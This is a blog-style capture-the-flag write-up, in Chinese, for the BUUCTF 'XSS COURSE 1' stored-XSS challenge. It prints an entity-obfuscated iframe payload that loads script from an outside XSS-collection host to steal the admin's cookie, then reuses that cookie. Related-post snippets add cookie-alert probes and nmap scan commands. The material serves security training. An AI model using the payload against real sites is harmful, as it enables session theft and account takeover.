BUU XSS COURSE 1

最新推荐文章于 2025-07-30 11:07:47 发布

原创最新推荐文章于 2025-07-30 11:07:47 发布 · 3.2k 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#xss

BUUCTF 专栏收录该内容

1 篇文章

订阅专栏

文章讲述了如何利用存储型XSS漏洞，通过内网XSS平台创建payload并注入到吐槽框，当admin访问时触发XSS，获取其cookie来访问特定URL，从而得到flag。

根据题目可知，这是一道xss题

打开如图所示

我们在吐槽框中输入1可以发现可以显示出来；

输入一个简单的xss代码

<script>alert(1)</script>

我们发现回显不出来

由此可知，这是存储型xss。

因为靶机没法访问外网，我们可以利用内网xss平台，

例如https://xss.pt/xss.php?do=login

先创建一个项目，然后把内容选上，然后把payload写进吐槽框，然后上传；

payload：

<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。&#x3C;&#x73;&#x43;&#x52;&#x69;&#x50;&#x74;&#x20;&#x73;&#x52;&#x43;&#x3D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x73;&#x3A;&#x2F;&#x2F;&#x69;&#x30;&#x2E;&#x61;&#x6C;&#x2F;&#x4F;&#x39;&#x55;&#x50;&#x49;&#x33;&#x22;&#x3E;&#x3C;&#x2F;&#x73;&#x43;&#x72;&#x49;&#x70;&#x54;&#x3E;>

在xss平台我们可以看到有一个admin的访问记录，利用管理员的cookie，以及来访地址，去访问url

http://xxxxxxxxxxxxxxxxxxxxxxxxxx/backend/admin.php

根据提示

我们换取admin的cookie

flag就出来了

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

TKar0

关注关注

4
点赞
踩
2

收藏

觉得还不错? 一键收藏
3
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【CTF练习】BUU XSS COURSE 1（XSS获取cookie登录）

m0_73866435的博客

02-28

5473

有两个尝试点。

BUUCTF/BUU SQL COURSE 1

weixin_44041994的博客

03-19

1070

登录按钮点击后是一个登陆界面，随意输入字符点击后显示提示信息"用户名或密码错误"，并且抓包发现是提交的POST请求，可以对该登录界面进行暴破操作，但是因为需要猜解两个字段内容且密码内容无提示，时间需求比较久，且需要较庞大的字典。通过判断可知contents表应为热点新闻的数据表，admin大概率为用户表，所以我们构建sql根据表名查询该表下的各字段名，成功得到字段名：id，username，password。热点按钮显示热点列表，有三个新闻，里面只有无意义的字符串，但是地址栏显示了/content/1。

3 条评论您还未登录，请先登录后发表或查看评论

4 条评论

qq_47361178 2025.08.26
很烂兄弟
- TKar0回复qq_47361178 2025.11.21
  让你看了？fvv

m0_75280378 2024.08.15
你这步骤也不具体啊，创建xss啥都没有

CSDN-Ada助手 2023.07.28
恭喜你这篇博客进入【CSDN每天最佳新人】榜单，全部的排名请看 https://bbs.csdn.net/topics/616837997。

2025.1.21——六、BUU XSS COURSE 1 XSS漏洞|XSS平台搭建

2402_87387800的博客

01-23

2771

题目来源：buuctf BUU XSS COURSE 1。

BUU XSS COURSE 1 wp XSS平台在线注册

SCP000111的博客

04-11

2173

具体原理就是相当于我们将我们的木马放到这个网站上了，当别人访问这个网站，我们的木马就会窃取他的cookie等相关信息。那么我们应该如何搭建自己的"木马服务器"呢，这里其实网上都有教程，不过需要内网穿透，而我们老白嫖怪了，网上有个免费的在线xss测试平台，这里把链接放出来。这里就提到一个重点了，自己的XSS平台，这个东西兄弟们可以理解为一个远程木马服务器，如果有访问，我们的服务器上就会获取他的信息。则判断存在注入点，XSS注入攻击是一个很大的类，这里我仅从这题出手，这题目是存储型XSS，相关知识自行搜索。

BUUCTF--BUU XSS COURSE

qq_46263951的博客

07-18

4576

吐槽<img scr="javascript.:alert('xss');">可以发现这里存在一个存储型XSS漏洞

XSS的基础与BUU XSS COURSE 1靶场练习

热门推荐

L2329794714的博客

03-29

1万+

二、漏洞利用与绕过方法两个层：WAF、代码层 1、黑名单绕过寻找没有被过滤的标签 2、双写、大小写转换双写：在直接将一些关键字用空字符替换的时候可以用大小写转换：过滤的时候没考虑大小写问题 2、利用标签事件比如标签点击、聚焦、鼠标动作事件来触发代码执行标签闭合：注入点在标签属性中，闭合标签使注入点在=变成一个独立的标签 3、HTML实体编码和js编码 html实体解析也不是在构建DOM树时解

BUU XSS COURSE 1解题思路、信息收集的基本方法

2503_91569085的博客

07-24

342

这个时候替换成管理者的网址和cookie，便可登录linux的账号，得到flag。使用nmap -sn -PE -n 14.17.92.71/24 查看C段。一个是自己电脑的cookie,一个是管理员账号的cookie。site:sysu.edu.cn site:加上域名。-sS”表示使用SYN扫描，这是一种常用的端口扫描技术。-Pn”表示不进行主机发现，直接扫描指定的IP地址范围。（3）使用nmap指令，运用终端进行查找。（1）使用工具，用fofa来查询。（2）运用浏览器进行查找。

1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md

08-10

一些关于xss的payload

xss注入讲解ppt.pptx

08-10

在 dvwa 中，可以使用 xss 模块来测试 xss 漏洞，例如，写入 <script>alert(1);</script> 然后提交，就会有弹框 1 出现，注入成功。再次尝试其他 xss 注入语句：<script>alert(document.cookie);</script> 成功拿到...

2025.2.5——一、BUU XSS COURSE 1 XSS漏洞|XSS平台搭建

2402_87387800的博客

02-05

1003

题目来源：BUUCTF BUU XSS COURSE 1。

BUUCTF_Web( XSS COURSE 1)xss

2401_87524087的博客

01-22

812

XSS即跨站脚本攻击（Cross-Site Scripting），是一种常见的网络安全漏洞.定义XSS攻击指攻击者在目标网站中注入恶意脚本，当用户访问该网站时，浏览器会执行这些恶意脚本，从而导致用户信息泄露、被控制等安全问题。因与CSS（层叠样式表）名称相似，为避免混淆，故简称为XSS。攻击类型。

101，【1】buuctf web BUU XSS COURSE 1

2402_87039650的博客

02-05

328

alert(1)

BUUCTF/BUU XXE COURSE 1

weixin_44041994的博客

03-22

1610

xxe全称是"xml external entity injection"，意为xml外部实体注入。服务端接收和解析来自用户端的xml数据，而没有做严格的安全控制,从而导致xml外部实体注入。原理是攻击者通过向服务器注入指定的xml实体内容，从而让服务器按照指定的配置进行执行。通过brup suite抓包发现，数据包上传的是xml数据。随意输入数据并登录，发现弹窗。打开页面发现是一个登录页面。所以可能存在xxe漏洞。输入flag，闯关成功。

104，【4】 buuctf web [3.3.4 案例分析]BUU XSS COURSE 1

2402_87039650的博客

02-05

516

alert('xss')

BUUCTF——BUU XXE COURSE 1